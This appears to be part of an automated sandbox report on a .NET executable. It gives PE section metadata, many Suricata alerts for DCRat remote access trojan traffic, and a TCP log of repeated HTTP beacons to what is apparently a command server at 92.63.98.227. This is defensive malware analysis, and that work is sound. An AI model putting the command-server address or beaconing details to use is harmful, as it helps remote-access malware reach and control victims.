            .text0x20000x12e5e40x12e60071989a2fbe93bd7bc6790a8a67e5f182False0.6678839719408847data6.988119508345658IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .sdata0x1320000x2fdf0x30007bc479402a0f90458733b96261aca5c4False0.3101399739583333data3.243241603062459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x1360000x31c0x4007cc0adee05c866afd88d5f7bf2194b18False0.361328125data2.646068329127162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x1380000xc0x200b9cbfa0bb36d29b58fc0540c3c5e8bb1False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_VERSION0x1360580x2c4dataEnglishUnited States0.4717514124293785

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Suricata IDS Alerts

            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
            2024-08-28T15:33:05.344387+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186880192.168.2.692.63.98.227
            2024-08-28T15:33:36.984645+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188380192.168.2.692.63.98.227
            2024-08-28T15:32:21.097692+0200TCP2034194ET MALWARE DCRAT Activity (GET)14971880192.168.2.692.63.98.227
            2024-08-28T15:32:37.126376+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972780192.168.2.692.63.98.227
            2024-08-28T15:33:59.790382+0200TCP2034194ET MALWARE DCRAT Activity (GET)15189180192.168.2.692.63.98.227
            2024-08-28T15:32:31.565096+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972480192.168.2.692.63.98.227
            2024-08-28T15:33:06.567162+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187080192.168.2.692.63.98.227
            2024-08-28T15:32:21.697481+0200TCP2034194ET MALWARE DCRAT Activity (GET)14971980192.168.2.692.63.98.227
            2024-08-28T15:33:35.764312+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188180192.168.2.692.63.98.227
            2024-08-28T15:32:37.876203+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972880192.168.2.692.63.98.227
            2024-08-28T15:33:42.156568+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188580192.168.2.692.63.98.227
            2024-08-28T15:33:22.963796+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187580192.168.2.692.63.98.227
            2024-08-28T15:33:04.720687+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186780192.168.2.692.63.98.227
            2024-08-28T15:32:20.478417+0200TCP2034194ET MALWARE DCRAT Activity (GET)14971780192.168.2.692.63.98.227
            2024-08-28T15:32:35.893759+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972580192.168.2.692.63.98.227
            2024-08-28T15:33:24.207738+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187780192.168.2.692.63.98.227
            2024-08-28T15:33:42.765236+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188680192.168.2.692.63.98.227
            2024-08-28T15:33:23.579696+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187680192.168.2.692.63.98.227
            2024-08-28T15:32:48.124816+0200TCP2034194ET MALWARE DCRAT Activity (GET)15185980192.168.2.692.63.98.227
            2024-08-28T15:32:29.712573+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972180192.168.2.692.63.98.227
            2024-08-28T15:33:43.410775+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188780192.168.2.692.63.98.227
            2024-08-28T15:32:48.730443+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186080192.168.2.692.63.98.227
            2024-08-28T15:33:13.321787+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187380192.168.2.692.63.98.227
            2024-08-28T15:32:54.044731+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186480192.168.2.692.63.98.227
            2024-08-28T15:33:44.007271+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188880192.168.2.692.63.98.227
            2024-08-28T15:32:30.956596+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972380192.168.2.692.63.98.227
            2024-08-28T15:33:59.191453+0200TCP2034194ET MALWARE DCRAT Activity (GET)15189080192.168.2.692.63.98.227
            2024-08-28T15:32:36.518457+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972680192.168.2.692.63.98.227
            2024-08-28T15:33:58.527866+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188980192.168.2.692.63.98.227
            2024-08-28T15:33:24.813155+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187880192.168.2.692.63.98.227
            2024-08-28T15:32:19.857080+0200TCP2034194ET MALWARE DCRAT Activity (GET)14971680192.168.2.692.63.98.227
            2024-08-28T15:34:00.390952+0200TCP2034194ET MALWARE DCRAT Activity (GET)15189280192.168.2.692.63.98.227
            2024-08-28T15:32:47.497104+0200TCP2034194ET MALWARE DCRAT Activity (GET)15185880192.168.2.692.63.98.227
            2024-08-28T15:33:11.912213+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187180192.168.2.692.63.98.227
            2024-08-28T15:33:13.921189+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187480192.168.2.692.63.98.227
            2024-08-28T15:33:12.521816+0200TCP2034194ET MALWARE DCRAT Activity (GET)15187280192.168.2.692.63.98.227
            2024-08-28T15:33:37.591556+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188480192.168.2.692.63.98.227
            2024-08-28T15:33:36.379420+0200TCP2034194ET MALWARE DCRAT Activity (GET)15188280192.168.2.692.63.98.227
            2024-08-28T15:33:05.947903+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186980192.168.2.692.63.98.227
            2024-08-28T15:32:54.639914+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186580192.168.2.692.63.98.227
            2024-08-28T15:32:52.796486+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186280192.168.2.692.63.98.227
            2024-08-28T15:32:53.437128+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186380192.168.2.692.63.98.227
            2024-08-28T15:32:30.339189+0200TCP2034194ET MALWARE DCRAT Activity (GET)14972280192.168.2.692.63.98.227
            2024-08-28T15:32:49.326493+0200TCP2034194ET MALWARE DCRAT Activity (GET)15186180192.168.2.692.63.98.227

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 28, 2024 15:32:19.250184059 CEST4971680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.257878065 CEST804971692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:19.257957935 CEST4971680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.258656979 CEST4971680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.263829947 CEST804971692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:19.857012033 CEST804971692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:19.857079983 CEST4971680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.868459940 CEST4971680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.871191978 CEST4971780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.873492956 CEST804971692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:19.876409054 CEST804971792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:19.876475096 CEST4971780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.876547098 CEST4971780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:19.881359100 CEST804971792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:20.476150990 CEST804971792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:20.478416920 CEST4971780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:20.482897997 CEST4971780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:20.487762928 CEST804971792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:20.491781950 CEST4971880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:20.496665955 CEST804971892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:20.496774912 CEST4971880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:20.496839046 CEST4971880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:20.506027937 CEST804971892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:21.097579956 CEST804971892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:21.097692013 CEST4971880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.097758055 CEST4971880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.098164082 CEST4971980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.102649927 CEST804971892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:21.102997065 CEST804971992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:21.104584932 CEST4971980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.104700089 CEST4971980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.109554052 CEST804971992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:21.697223902 CEST804971992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:21.697480917 CEST4971980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.697480917 CEST4971980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:21.702358007 CEST804971992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:29.107578039 CEST4972180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.112912893 CEST804972192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:29.113364935 CEST4972180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.113605022 CEST4972180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.119030952 CEST804972192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:29.712518930 CEST804972192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:29.712573051 CEST4972180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.716401100 CEST4972180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.717993021 CEST4972280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.721281052 CEST804972192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:29.723346949 CEST804972292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:29.723417044 CEST4972280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.723524094 CEST4972280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:29.728318930 CEST804972292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.339098930 CEST804972292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.339189053 CEST4972280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.339359999 CEST4972280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.341845989 CEST4972380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.345019102 CEST804972292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.346950054 CEST804972392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.347018003 CEST4972380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.347129107 CEST4972380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.352035046 CEST804972392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.956393003 CEST804972392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.956595898 CEST4972380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.957201004 CEST4972380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.961956024 CEST804972392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.962613106 CEST4972480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.967452049 CEST804972492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:30.967561960 CEST4972480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.967681885 CEST4972480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:30.972486019 CEST804972492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:31.564840078 CEST804972492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:31.565095901 CEST4972480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:31.565097094 CEST4972480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:31.570133924 CEST804972492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:35.295701981 CEST4972580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.300834894 CEST804972592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:35.301353931 CEST4972580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.301584005 CEST4972580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.306741953 CEST804972592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:35.893685102 CEST804972592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:35.893759012 CEST4972580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.895973921 CEST4972580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.897512913 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.901010990 CEST804972592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:35.902302027 CEST804972692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:35.902453899 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.902563095 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:35.907368898 CEST804972692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:36.517553091 CEST804972692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:36.518456936 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.520976067 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.520979881 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.525959969 CEST804972692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:36.525971889 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:36.526056051 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.526133060 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.531620979 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.123151064 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.126375914 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.126579046 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.126847029 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.132966995 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.132980108 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.133057117 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.133161068 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.138050079 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.876094103 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.876203060 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.876391888 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.881172895 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:46.880820990 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:46.885754108 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:46.885849953 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:46.886065960 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:46.890863895 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.497040987 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.497103930 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.500103951 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.501667976 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.504909039 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.506639957 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.506710052 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.506887913 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.511729002 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.124619961 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.124815941 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.124878883 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.127939939 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.129715919 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.132754087 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.132827997 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.132966042 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.137789965 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.728179932 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.730443001 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.730478048 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.730946064 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.735363007 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.735749960 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.735830069 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.735930920 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.740748882 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:49.324856043 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:49.326493025 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:49.330153942 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:49.335088968 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.179207087 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.184371948 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.184473991 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.184604883 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.189404011 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.796402931 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.796485901 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.836227894 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.837270021 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.841088057 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.842096090 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.842164040 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.842684031 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.847569942 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.437060118 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.437128067 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.437206984 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.439496040 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.442171097 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.444407940 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.444561958 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.444685936 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.449512959 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.044675112 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.044730902 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.044821978 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.045140982 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.049693108 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.049962044 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.050054073 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.050138950 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.054874897 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.639832973 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.639914036 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.640058994 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.644886971 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.125274897 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.130146980 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.130220890 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.130373955 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.135116100 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.720621109 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.720686913 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.727936029 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.728612900 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.735187054 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.736469030 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.736556053 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.736651897 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.743999004 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.344212055 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.344387054 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.344502926 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.346785069 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.352264881 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.354286909 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.354358912 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.354413033 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.362514019 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.947752953 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.947902918 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.948004007 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.948343039 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.952771902 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.953139067 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.953402996 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.953476906 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.958261013 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:06.567076921 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:06.567162037 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:06.567250967 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:06.571957111 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.319086075 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.324013948 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.324124098 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.324280977 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.329046011 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.912022114 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.912213087 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.914129019 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.914789915 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.919012070 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.919641018 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.919703960 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.919771910 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.924556017 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.521725893 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.521816015 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.521903992 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.524056911 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.526670933 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.528970957 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.529052973 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.529107094 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.533914089 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.321707964 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.321787119 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.321882010 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.322201967 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.328119993 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.328131914 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.328191996 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.328346968 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.338038921 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.921120882 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.921189070 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.921281099 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.926613092 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.365149021 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.377100945 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.377192974 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.377326012 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.382606030 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.963675022 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.963795900 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.965699911 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.966355085 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.970535994 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.971155882 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.971241951 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.971332073 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.976176023 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.579605103 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.579695940 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.579792976 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.583153963 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.584676981 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.588099003 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.588184118 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.591308117 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.597675085 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.207647085 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.207737923 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.207822084 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.208112001 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.212694883 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.212928057 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.213009119 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.213080883 CEST5187880192.168.2.692.63.98.227
